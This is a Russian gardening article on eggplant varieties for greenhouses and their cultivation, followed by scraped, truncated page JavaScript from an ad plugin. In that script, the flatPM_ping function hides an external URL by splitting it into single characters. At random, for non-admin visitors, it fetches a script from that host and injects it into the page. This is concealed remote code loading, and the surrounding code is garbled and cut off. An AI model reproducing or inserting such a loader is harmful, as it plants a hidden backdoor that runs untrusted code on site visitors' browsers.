1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

В чем особенности баклажанов для теплиц

Лучшие сорта баклажанов для теплиц

Получать стабильно высокие урожаи баклажан можно лишь при выращивании их в теплицах. Микроклимат в закрытом грунте более благоприятный для выращивания культур, чем открытый грунт, плюс также и в том, что его можно регулировать в зависимости от собственных нужд. Лучшие сорта баклажанов для теплиц будут описаны ниже в статье.

В чем особенности баклажанов для теплиц?

Далеко не каждая культура сможет выжить в закрытом грунте. Лучшие сорта баклажанов для теплиц, которые способны расти в теплице, имеют массу особенностей в плане показателей и агротехники.

  • Возможность возделывания без солнечного света. Даже если теплица сделана из тонкой пленки, в ней не будет столько солнечного света, сколько и в открытом грунте. Однако далеко не каждый сорт может развиваться при недостатке солнца.
  • Устойчивость к завышенной влажности и жаре. В теплицах всегда очень высокие температуры и проветривания не сильно меняют ситуацию.

В теплицах урожайность любого сорта увеличивается как минимум в 1,5 раза

Стоит отметить, что сорта баклажанов для теплиц обычно нуждаются в качественном уходе. В теплице обычно больше работы, чем в отрытом грунте. Там хорошо растут не только культуры, но также сорняки, могут часто появляться болезни, вредители и т. д. Так что уход нужен кропотливый и регулярный.

Описание сортов баклажан для теплиц

Лучшие сорта баклажанов для теплиц имеют хорошие характеристики, они просты в уходе и выращивании.

  • «Бычье сердце» созревает за 110 суток – среднеспелый вид. Это гигантский сорт, дающий плоды по 500 г и более. Форма у них округлая, немного напоминает сердце, суженая к кончику, но не сильно. Из-за тяжести плодов сорт нуждается в подпорках и подвязках. Окрас баклажан фиолетовый, кожура блестит. Мякоть без горечи – белая и плотная. Может лежать до 2 недель при правильных условиях хранения.
  • «Черный принц» имеет черные плоды. Форма цилиндрическая, вытянутая (до 20см), немного ребристая, диаметром до 10 см и массой 180-200 г. Куст растет до 80 см в высоту при выращивании в простой теплице. Семян почти нет. Плоды не имеют пустот, мякоть плотная, желтовато-белая, горечь слабая.

Сорта баклажан для теплиц

К популярным лучшим сортам баклажанов для теплиц нужно также отнести «Алмаз», «Байкал», «Городовой F1», «Фиолетовое чудо F1», «Щелкунчик», «Фабина F1».

Какие сорта самые урожайные?

Для выращивания на продажу подходят только урожайные сорта баклажанов для теплиц.

Самые урожайные сорта баклажан для теплиц

  • «Багира» созревает за 100-110 дней, растет быстро, обильно, дружно. С квадратного метра за сезон собирают 10-12 кг баклажан. Плоды среднего размера, массой до 350 грамм, но чаще в пределах 250 г. Мякоть зелено-белая, без горечи. Хранятся хорошо, можно транспортировать, практически не подвергается болезням.
  • «Черный красавец» – среднеспелый сорт баклажанов для теплицы, созревает за 110-115 дней. Урожайность высокая – 10-13 кг/м. кв. Растет аккуратным кустиком, много места не занимает в теплице. Всходит и плодоносит дружно. Плоды округлые, грушевидные, широкие, массой до 250 г. Окрас темно-фиолетовый или черный. Кожура глянцевая, блестит. Мякоть светло-зеленая, средней плотности, нежная на вкус.
  • «Тезка» имеет приятный, лиловый окрас кожуры. Растет даже в плохих условиях, при недостаточном уходе. Куст не очень большой, на нем имеются едкие шипы. Плоды большие, средняя масса 500 г, рекордная – 800 г. Созревает за 120-130 дней. Плоды универсального потребления. Урожайность от 9 до 12 кг/м. кв.
  • «Вакула» – ранний сорт, не только дает высокий урожай общим количеством до 12 кг/м. кв., но также обладает очень высоким кустом, до 2 метров. Плоды фиолетовые, до 400 г, мякоть белая. Из-за перегруза плодами растение нужно подвязывать несколько раз за сезон.

Лучшие белые сорта баклажанов для теплиц

Сорта баклажанов для теплиц белого цвета – довольно распространенные. Есть много таких разновидностей. Они отличаются мягким вкусом, имеют отличные товарные качества, ниже описание лучших сортов по отзывам огородников:

Лучшие белые сорта баклажанов для теплиц

  • «Бибо F1» – ранний гибрид. Растение средней высоты, листочки небольшие, зеленые. Плоды до 210 г, привычной формы баклажана, удлиненные, кожура чисто белоснежная, блестящая. Мякоть также светлая, мягкая по консистенции, горечь отсутствует. Имеется сопротивляемость к некоторым болезням, транспортабельность хорошая. Урожайность высокая.
  • «Белая ночь» созревает за 100-115 суток, среднеспелый вид. Растет до 75 см в высоту. Баклажаны не очень длинные (17-25 см), грушевидные, массой до 280 г. Кожура и мякоть светлые, вкус без горчинки. Урожайность 5,6-6 кг/м. кв. Рекомендуется в первую очередь для переработки.
  • «Сосулька» имеет довольно необычную форму плодов. Она удлиненная и немного зауженная к концу, как дайкон и такого же белоснежного цвета. Созревает на 110-115 день. Кустики имеет небольшие, раскидистые, высотой до 70 см. В опорах и подвязках не нуждается, так как плоды небольшие, до 200 г. Мякоть плотная, нежная на вкус и сочная, привкуса горечи нет. Плодоношение стабильное, транспортабельность и товарные качества хорошие.

В теплицах также можно выращивать белые сорта баклажан «Пеликан» и «Айсберг».

Необычные сорта для теплиц

Наиболее популярными являются привычные для всех черные или темно-фиолетовые баклажаны. Но есть малоизвестные сорта баклажанов для теплиц, имеющие необычный окрас кожуры. Эти виды все больше набирают популярность.

Необычные сорта для теплиц

  • «Аленка F1» – гибридная разновидность баклажанов с зелеными плодами. Выращивается исключительно в теплицах, так как под открытым небом плодам трудно формироваться. Созревание происходит на 105 сутки. Кустики невысокие, густые. Форма у плодов привычная, удлиненная, цилиндрическая, вес в пределах 350 г. Применение универсальное, мякоть не имеет горечи. Средняя урожайность – 7,5 кг/м. кв.
  • «Матросик» – полосатый сорт баклажанов для теплицы. Относится к среднеранним. Растет до метра в высоту. Длина плодов до 17 см, вес может достигать 500 г! Основной цвет сиреневый, а полоска белая. Урожайность в среднем 8 кг/м. кв. Употребление универсальное, можно есть этот сорт даже в сыром виде.
  • «Санчо Панса» – интересный сорт с большими, практически круглыми плодами темно-фиолетового или черного цвета. Сорт среднеспелый, созревание происходит на 120 сутки. Плоды по 500-700 г, с гладкой, блестящей кожурой. Урожайность средняя – 7-9 кг/м. кв.
  • «Розовый фламинго» – среднеранний сорт. Первые плоды можно собирать с 125-135 дня после появления всходов. Куст растет до 120 см в пленочных теплицах и до 180 см в зимних, поликарбонатных. Плоды длинные, могут достигать 40-45 см, ширина – 4-5 см. Окрас лилово-розовый, мякоть белая. Семян в плодах не много, они имеются только в верхней, самой толстой части плода. Урожайность дружная, баклажаны созревают в кистях по 2-6 штук. Сорт транспортабелен, имеет отличный вкус, мякоть не горчит.

ВИДЕО — Баклажаны в теплице

Баклажаны в теплице: выращивание и уход

Несмотря на то, что баклажан тоже относится к пасленовым, никакого отношения к Новому Свету и родине томатов он не имеет. А ведет свою родословную из Индокитая, где преобладает тропический влажный жаркий климат. Ничего удивительного, что в наших далеко не таких тропических условиях комфортнее всего “синенькие” чувствуют себя именно в теплицах.

К понижению температур они еще чувствительнее, чем томаты. Для баклажана температура ниже +10 о С губительна, после этого рост прекращается, и начинается медленный, но верный процесс отмирания надземной части. Именно распространение в подсобном хозяйстве теплиц из поликарбоната дало возможность выращивать баклажаны и обеспечить им соответствующий уход не только в южных регионах страны.

Что любят баклажаны

В Европе массово начали культивировать это растение не так давно — привезли его в эпоху географических открытий голландские мореплаватели. Последние 200 лет никто уже не считает этот овощ импортной диковинкой. В царской России на Соловках в теплицах монахи выращивали не то, что баклажаны — бананы.

Ничего удивительного, что рядом с домом в современной теплице можно создать такие условия, что баклажан успеет не только пройти цикл развития от рассады до уборки урожая, а использование современных продуктивных сортов при должном уходе позволит вырастить 3-4 кг “синеньких” с квадратного метра грядки (1кг с куста).

Не лишним будет напомнить, что же нравится этим баклажанам:

  1. температура земли не ниже +18-19 о С,
  2. высокая влажность почвы при низкой влажности воздуха,
  3. температура воздуха примерно +25-28 о С.

Получается, сразу необходимо обзавестись градусниками для измерения температуры почвы и воздуха.

Посев на рассаду баклажанов начинают максимум за 2 месяца до высадки в грунт. У кого теплица не первый год, примерно представляют (а многие ведут и записи!), когда у них земля прогревается до 18 о С. Лучший возраст для пересадки рассады — примерно, 50 дней. В этом возрасте растение обычно имеет высоту около 20 см.

Рассада — ничего сложного

Выращивание рассады баклажанов ничем не отличается от помидорной.

  1. Семена можно прорастить немного во влажной тряпочке. Посев сухими семенами дает тот же результат, но всходы появятся на 2 дня позже.
  2. Посеянные на глубину 1,5-2 см семена накрывают пленкой или крышкой и помещают в теплое место (+25 о С).
  3. После появления петелек всходов пленку снимают, а емкость выставляют на свет. Температура теперь должна быть около +20 о С.
  4. Поливать следует очень осторожно, чтобы рассада не заболела “черной ножкой”. Оптимальный вариант — нижний полив (через поддон).

Если рассада у вас растет в отдельных емкостях, пикировать ее вовсе не обязательно.

Густо взошедшую рассаду в посевном ящике на этапе появления первой пары настоящих листьев следует произвести пересадку по персональным емкостям объемом примерно 200 мл (стакан).

Это именно тот случай, когда спешка приветствуется. Совсем крохотные сеянцы с недоразвитыми корешками безболезненно переносят пикирование.

Когда у сеянцев сформируется 4-5 настоящих листьев (это обычно случается, как заявлено выше, примерно на 50 день), рассада готова начать самостоятельную жизнь в тепличной грядке.

[warning]Обязательно проверьте температурный режим перед высадкой — лучше повременить, если земля не успела прогреться.[/warning]

Непосредственно накануне пересадки рассаду лучше не поливать, несмотря на повсеместные рекомендации. Этим вы убьете 2 зайцев:

  1. корневая система из горшков (стаканов) будет извлекаться вместе со всем земляным комом,
  2. само растение будет чуть вялое, не такое ломкое в руках.

Корень рассады высаживаем в грядку немного глубже, чем она росла до этого, на 1-2 см. Расстояние между кустами соблюдайте примерно 60 см. Вовсе не обязательно сажать растения “по линеечке”, посадка “зигзагом” позволит на тепличной грядке разместить больше кустов. Для полноценного освещения и питания на 1м 2 должно расти 3 баклажана.

Именно на таком расстоянии высаживают популярный среди дачников ранний сорт “Вера”, который отличается не только сроками созревания 110-120 дней, но и стабильностью урожая. Это значит, что даже если вы никогда не выращивали “синенькие”, по истечению этого срока можно с 1 квадратного метра тепличной грядки собрать 3-4 кг урожая.

Сорт “Вера” популярен вкусом плодов (без горечи), белой плотной мякотью и очень тонкой кожицей. Плоды фиолетового оттенка очень удобного для кулинарии размера 120-180 граммов имеют классическую для баклажанов грушевидную форму.

Баклажаны сорта “Вера” были созданы селекционерами под запросы огородников для выращивания в теплице: сорт никак не относится к суперурожайным, но его достоинства перекрывают этот небольшой минус. При правильном уходе за небольшой грядкой из 10-15 растений вы сможете все лето иметь на столе вкусные и полезные блюда из баклажанов.

Уход за рассадой

После высадки рассады в грунт ее следует хорошо полить и сверху присыпать сухой землей или торфом, чтобы предотвратить образование корки на поверхности грунта. Если все сделано правильно, главное, тепло и воды вдосталь — баклажаны скоро пойдут в рост. На этом этапе весь уход заключается в поливах и рыхлениях почвы.

Через 2 недели после высадки в грунт, когда явно начался активный рост (появились новые листья), необходимо провести подкормку азотными удобрениями (выбирайте вариант по обстоятельствам) из расчета по 0,5 л раствора под корень:

  1. органикой — разведенный 1:20 куриный помет или коровяк,
  2. спичечный коробок азотной селитры на ведро воды.

Тем, кто не знает

Любая корневая подкормка состоит из 3 операций:

Такое изобилие воды во время подкормки убережет нежные корешки от химического ожога.

Подкормки органикой следует провести еще 2-3 раза во время плодоношения, а для подпитки куста минеральными солями калия и других микроэлементами очень полезно землю под баклажанами посыпать древесной золой.

Поливаем правильно

Оказывается, поливать тоже можно неправильно — это каждый день по чуть-чуть. От такого полива один вред:

  1. образуется корка на поверхности, трескается и в результате земля пересыхает еще больше;
  2. баклажан воду так и не получил.

Полить баклажаны правильно — промочить землю на глубину не менее 20 сантиметров.

  1. листья должны остаться сухими (полив, исключительно, под корень),
  2. поливать следует утром,
  3. вода должна быть теплой (22-25 о С),
  4. сразу после полива мульчируете грядку и проветриваете теплицу.

После каждого полива обязательно проводите рыхление почвы с легким окучиванием.

[important]Корневая система баклажана расположена очень близко от поверхности, поэтому рыхлить глубже 5 см категорически нельзя. Чтобы вообще не заниматься рыхлением, замульчируйте грядку соломой, торфом, агроволокном, опилками…[/important]

Формируем куст правильно

Наконец, поливы и подкормки дали видимый результат — рассада начала интенсивно расти. Если упустить момент и пустить процесс на самотек, как минимум с половиной урожая можно мысленно распрощаться.

Ситуация складывается не в пользу урожая — в период интенсивного роста пробуждаются спящие почки в пазухах листьев и вместо образования бутонов и завязей вы получаете огромный зеленый куст без намека на цветы и будущие плоды.

Баклажаны можно выращивать и совсем не прибегая к формировке — достаточно убирать желтеющие листья. Плодов образуется много, но мелких. Следует учесть немаловажный факт, что ускорить начало плодоношения можно именно формировкой.

Некоторые огородники идут по пути наименьшего сопротивления. Процесс формирования куста баклажанов при выращивании в теплице ограничивается выщипыванием так называемого “коронного” цветка, после удаления, которого у баклажана начинают расти ветви 2-го порядка.

[warning]Это только, кажется, что вы лишились первого баклажана. Можете провести эксперимент — на половине кустов оставить “коронный” цветок и сравнить после урожайность. Дело в том, что пока не дозреет этот первый плод на кусте, остальные завязи расти не будут.[/warning]

Чтобы плоды были покрупнее, некоторые огородники при выращивании в теплице проводят прищипки и пасынкование баклажанов. Наглядно представлен этот процесс в сюжете ЮТУБа о формировке этой культуры.

Все формирующие куст операции следует прекратить, когда появились первые завязи. Травмировать растение очень нежелательно. В конце сезона целесообразно прищипнуть верхушки побегов и оборвать все бутоны, чтобы все силы растение направило на формирование и созревание оставшихся последних завязей.

Лучшие сорта баклажанов для теплицы

Для многих овощеводов баклажаны давно перестали быть «заморским» деликатесом. Соблюдая основные принципы и технологию выращивания в теплицах этой овощной культуры, используя районированные селекционные сорта, можно получить высокий урожай. Как правильно выбрать сорт для теплиц, собрать и сохранить овощи, расскажем в этом материале.

Особенности баклажанов для теплиц

Высокие урожаи баклажанов в теплице, где нет резких колебаний температур, ветра и заморозков, можно получить, учитывая особенности этого овоща:

  • влага — уроженец тропиков, баклажан любит хорошо увлажнённую почву и сухость воздуха (не выше 60–70%);
  • свет — молодая рассада лучше развивается при коротком световом дне, но в дальнейшем требует яркого солнечного освещения;
  • тепло — баклажан очень чувствителен к холоду, лучшей для образования завязей и роста плодов считается температура в диапазоне +25. +28°С;
  • подкормки — внесение удобрений нужно проводить 3–4 раза за сезон.

Выбирая материал, из которого будет изготовлена теплица, следует помнить, что сооружения из поликарбоната лучше, чем стеклянные или плёночные, в которых сильно перегревается и пересушивается воздух. В поликарбонатных теплицах для овощей можно создать соответствующий микроклимат: нужные температуру и влажность.

Лучшие сорта баклажанов для выращивания в теплице

Чтобы безошибочно выбрать сорта баклажанов для посева семян в теплице, необходимо учитывать следующие факторы:

  • урожайность;
  • время созревания;
  • рослость растения;
  • вкусовые качества плодов (отсутствие горечи);
  • стойкость к заболеваниям.

Кроме основных сортов баклажанов, существуют и гибридные, которые в классификации обозначаются добавлением символов F1. Качества гибридов усилены путём скрещивания сортов для снижения требований к условиям возделывания.

Если ещё недавно сорта для средней полосы, например, для Подмосковья, и раннеспелые сорта для Урала почти не встречались, то теперь, благодаря успешной работе селекционеров и разработке новых методов возделывания, существует богатый ассортимент сортов и гибридов для выращивания. Для холодных регионов, таких, как Подмосковье, Урал, Сибирь, предпочтение следует отдать раннеспелым и среднеспелым сортам и гибридам. Рассмотрим самые популярные сорта баклажанов, пригодных для выращивания в теплице.

Щелкунчик

Щелкунчик среднеспелый, высокоурожайный и неприхотливый гибрид со следующими характеристиками:

  • куст раскидистый, вырастает до 2 м и требует подвязки;
  • сбор плодов можно начинать на 100-й день после посева;
  • большие плоды вырастают до 400 г и требуют подпорки, их цвет густой фиолетовый, кожура глянцевая;
  • внутренность плода белая, упругая, с грибным привкусом, не имеет горечи;
  • хорошо выдерживает транспортировку и хранение;
  • урожайность зависит от условий возделывания, продолжительности оборота и составляет 5–10 кг/1 м².

Багира

Раннеспелый гибрид, устойчивый к болезням и нетребовательный к большим площадям, что позволяет сэкономить место в теплице.

Его характеристики:

  • урожай можно собирать через 100 дней после всходов;
  • взрослое растение имеет высоту около 120 см;
  • узкоцилиндрические плоды густо-фиолетового цвета с глянцевой кожурой весят 250–300 г;
  • внутренность плода бело-салатового цвета, средней упругости, без горечи;
  • можно собрать с одного куста до 3 кг.

Этот сорт особенно любят выращивать огородники, поскольку он менее подвержен вспыхивающим в теплицах болезням.

Байкал

Неприхотливый в уходе среднеспелый гибрид, устойчивый ко многим болезням. Переживёт даже временную засуху.

Его можно охарактеризовать так:

  • кусты высокие (1,2 м);
  • созревание проходит за 100–110 дней после всходов;
  • каплевидные плоды тёмно-фиолетового, почти чёрного цвета массой 320–370 г;
  • внутренность упругая, без горечи, бело-салатового цвета;
  • урожайность — 2,8–3,2 кг с куста;
  • хорошо выдерживает перевозку и хранение.

Балагур

Высокоурожайный, требующий тщательного ухода раннеспелый сорт с кистевым плодоношением характеризуется следующими особенностями:

  • созревает на 90-й день от посева;
  • взрослое растение вырастает до 1 м;
  • кисти формируются с 3–6 плодами весом до 200 г;
  • плоды овальные с густым лиловым оттенком;
  • внутренность упругая, без горечи;
  • плодоношение высокое: с одного растения удаётся снять 50 и даже больше плодов при надлежащем уходе.

Фиолетовое чудо F1

Раннеспелый гибрид, который при правильном уходе обеспечит хорошим урожаем.

Его характеристики:

  • вегетационный период длится 90–100 дней;
  • взрослое растение вырастает выше 1 м;
  • плоды слабоизогнутой формы, с заострённым кончиком, тёмно-фиолетового цвета, с глянцевой кожурой, весят 100–300 г;
  • внутри плод зеленоватый, с отличным вкусом, абсолютно без горечи;
  • отсутствие шипов на плодовой чашечке порадует во время сбора урожая;
  • урожайность составляет примерно 5 кг с 1 м² или до 10 плодов с куста;
  • хорошо выдерживает транспортировку и хранение.

Сорт устойчив к вертициллёзному увяданию и паутинному клещу.

Фабина

Фабина сорт-гибрид с очень ранним созреванием (через 70 дней после всходов). Неприхотлив и хорошо отзывается на подкормки.

К его характеристикам следует отнести:

  • куст приземистый и компактный, не более 60 см;
  • плод почти чёрного цвета в форме цилиндра, весит более 250 г;
  • можно получить 8–10 плодов с одного куста;
  • сорт имеет стойкость к вертициллёзному увяданию и поражению паутинным клещом.

Чёрная луна

Устойчивый ко многим болезням (в том числе и к табачной мозаике) среднеспелый гибрид характеризуется такими свойствами:

  • созревает после 125 дня от посева;
  • завязи хорошо образуются даже при низких температурах;
  • шаровидные плоды с ростом удлиняются;
  • куст вырастает до 50–70 см, раскидистый и требующий пространства, но не нуждается в подвязке;
  • поверхность плодов блестящая, тёмно-фиолетовая;
  • мякоть светлая, пустоты и горечь отсутствуют;
  • при тщательном уходе, регулярном поливе и соблюдении светового режима можно получить плоды до 300 г весом и собрать урожай до 5 кг/1 м².

Софья

Поздний сорт с вегетационным периодом в 130–150 дней имеет такие характеристики:

  • приземистые кусты не требуют больших площадей;
  • толстые грушевидные плоды тёмно-фиолетового оттенка, крупные (500–800 г), нуждаются в подпорке;
  • урожайность составляет примерно 6–8 кг с 1 м²;
  • сорт легко переносит низкие температуры, но склонен к заболеваниям, избежать которые можно соблюдением правил агротехники.

Чёрный красавец

Чёрный красавец поздний сорт, стойкий практически ко всем заболеваниям паслёновых культур.

Его характеристики:

  • вызревание через 125–130 дней от посева;
  • куст приземистый (до полуметра) и компактный;
  • плоды грушевидные, чёрно-фиолетового окраса, что объясняет название сорта;
  • масса одного плода может доходить до 800 г при выращивании в теплице (в открытом грунте — 300 г);
  • мякоть белая, отличного вкуса, горечи нет;
  • урожайность составляет 8–10 кг с 1 м².

Алёнка

Среднеспелый сорт: до начала технической спелости проходит 108 дней.

Характеризуется такими особенностями:

  • кусты невысокие;
  • цилиндрические плоды необычного для баклажанов светло-салатового цвета с зеленоватой мякотью, обладающей грибным вкусом;
  • масса овоща — около 300 г;
  • отсутствие шипов на плодовой чашечке, что облегчает сбор урожая;
  • при выращивании в теплице урожайность составляет 7,5 кг/1 м².

Особенности выращивания и ухода за баклажанами в теплице

Каждому овощеводу перед началом сезонных работ нужно ознакомиться с ключевыми правилами возделывания баклажанов в теплице:

  1. При слабом развитии побегов подкормку растений осуществляют азотными удобрениями.
  2. Если кусты дают много зелени, используют калийные удобрения.
  3. При отсутствии цветения и образования завязей опрыскивают кусты раствором борной кислоты (2 г на 10 л тёплой воды).
  4. При слабом росте корней кусты подкармливают сульфатом магния.

Перед подкормкой кусты нужно обязательно полить во избежание ожогов корней. В теплице кусты баклажанов нужно подвязывать на шпалеры или колья, поскольку растения определённых сортов вырастают рослыми и хрупкими, а обилие плодов может повредить стебель. Но при этом нужно учитывать светолюбивость овоща и не затенять насаждения. Чаще всего в теплицах выращивают низкорослые сорта, которые не требуют формирования куста и подвязывания.

Соблюдая температурный режим в теплице, нужно помнить, что лучшей для образования завязей и роста плодов считается температура в пределах +25. +28°С. Колебания температур как в большую, так и в меньшую сторону могут привести к сбрасыванию цветков и плодов.

Полив растений производят 1–2 раза в неделю в зависимости от погоды. Во время плодоношения поливать растения лучше ранним утром, желательно тёплой водой, а почву после этого осторожно рыхлить, не допуская корки вокруг стебля, а также мульчировать торфяно-перегнойной смесью в соотношении 3:1.

Возможные проблемы выращивания

Растения в теплице нужно регулярно осматривать, чтобы вовремя заметить наличие болезней и своевременно проводить профилактику против насекомых-вредителей. Фитофтора и табачная мозаика — наиболее частые болезни баклажанов в теплицах. Фитофтора проявляется на листьях бурыми пятами, переходящими на стебли и плоды. Если своевременно не принять меры, растение погибнет. Вирус табачной мозаики сначала окрашивает листья в светлые тона, а затем на них появляется тёмно-зелёная «мозаика». Для борьбы с этими недугами используют препараты «Циркон», «Фитоспорин», «Антракол».

Чтобы избежать загнивания растений и появления грибкового заболевания — серой гнили — необходимо в знойные дни теплицу, где возделывают баклажаны, проветривать целый день. Это будет способствовать улучшению вентиляции и уменьшению влажности в парнике.

Колорадский жук, паутинный клещ, белокрылка, тля и слизни могут нанести существенный урон урожаю овощей. Для борьбы с этими насекомыми-вредителями необходимо использовать средства, приобретённые в специализированных магазинах («Фитоверм», «Актеллик», «Актара»), но не стоит увлекаться «химией» во время плодоношения. Лучше убирать вредителей вручную или установить липкие ловушки.

Сбор и хранение урожая

Сбор овощей проводят при достижении плодами технической зрелости, не допуская их перезревания. Дело в том, что в перезревших баклажанах накапливается соланин — вещество, которое придаёт овощам горьковатый привкус. Употреблять в пищу такие овощи нельзя. При технической спелости овощи имеют характерный цвет, размер и форму в соответствии с выращиваемым сортом.

Спелый баклажан имеет глянцевую поверхность, он упругий на ощупь, его мякоть без пустот с маленькими семенами. Чтобы не повредить рослые и хрупкие стебли, овощи нужно обрезать острым ножом, ножницами или секатором. Очередную уборку делают через неделю, выбирая дозревшие плоды. Чтобы собранный урожай не потерял питательную ценность, его желательно сразу переработать.

Различные способы хранения плодов имеют соответствующие требования к температуре и влажности:

  • овощи, которые хранятся до 2 недель: температура — +4. +6°С, влажность — 90%;
  • овощи, которые хранятся до месяца: температура +2. +4°С, влажность — 95%.

Плоды также можно замораживать, предварительно пробланшировав или обжарив. Для длительного хранения нужно подготовить прохладное, тёмное и сухое помещение с хорошей вентиляцией. Овощи укладывают в коробки или ящики, пересыпая их соломой, мелким песком или золой. Можно также хранить баклажаны, завёрнутыми в тёмную бумагу. Поскольку эти овощи имеют природный защитный слой на поверхности кожуры, их не рекомендуется мыть перед закладкой на хранение.

Баклажаны не любят плотных неудобренных почв, полива прохладной водой, резких колебаний температуры, продолжительного похолодания. Учитывая все требования такого «капризного» овоща, как баклажан, и обеспечивая его надлежащим уходом, можно собрать хороший урожай аппетитных и полезных плодов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var 